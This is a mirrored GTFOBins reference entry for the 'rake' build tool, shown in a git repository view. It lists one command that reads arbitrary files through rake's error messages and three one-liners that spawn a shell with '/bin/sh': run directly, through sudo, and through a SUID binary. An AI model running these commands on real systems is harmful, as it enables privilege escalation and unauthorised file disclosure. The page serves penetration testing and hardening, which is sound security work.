1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/rake.md

15 lines
352 B
Markdown
Raw Normal View History

2020-03-17 08:54:39 +01:00
---
functions:
file-read:
- description: The file is actually parsed and the first wrong line is returned in an error message.
code: |
LFILE=file-to-read
rake -f $LFILE
shell:
- code: rake -p '`/bin/sh 1>&0`'
2020-03-17 08:54:39 +01:00
sudo:
- code: sudo rake -p '`/bin/sh 1>&0`'
limited-suid:
- code: ./rake -p '`/bin/sh 1>&0`'
2020-03-17 08:54:39 +01:00
---